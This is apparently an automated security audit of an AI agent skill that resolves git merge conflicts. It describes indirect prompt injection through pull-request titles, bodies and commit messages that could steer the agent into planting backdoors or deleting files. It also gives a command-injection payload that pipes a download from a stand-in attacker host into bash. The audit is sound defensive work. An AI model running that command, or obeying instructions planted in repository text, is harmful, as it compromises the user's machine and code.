roo-conflict-resolution
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [PROMPT_INJECTION] (HIGH): Indirect Prompt Injection vulnerability through untrusted external content.
- Ingestion points: The skill retrieves the `title` and `body` of a Pull Request using `gh pr view` (SKILL.md: Step 2) and analyzes commit messages and git history (SKILL.md: Phase 1).
- Boundary markers: There are no delimiters or explicit instructions to ignore embedded commands within the fetched PR data.
- Capability inventory: The skill has extensive capabilities, including executing shell commands (`git`, `gh`) and modifying the local file system.
- Sanitization: No sanitization or filtering is applied to the PR metadata or commit history before the agent uses it to 'determine the best resolution strategy' (SKILL.md: Phase 2).
- Risk: An attacker could craft a PR description or commit message containing instructions that trick the agent into performing malicious code changes, such as introducing backdoors or deleting sensitive files.
- [COMMAND_EXECUTION] (HIGH): Risk of Command Injection via shell command interpolation.
- Evidence: The variable `[PR_NUMBER]` is directly interpolated into multiple shell commands: `gh pr view [PR_NUMBER]` and `gh pr checkout [PR_NUMBER] --force` (SKILL.md: Steps 2-3).
- Risk: While the skill mentions validation, a failure to strictly enforce numeric-only input allows an attacker to provide a malicious payload (e.g., `123; curl http://attacker.com/malware | bash`) that would be executed by the host shell.
Recommendations
- AI detected serious security threats
Audit Metadata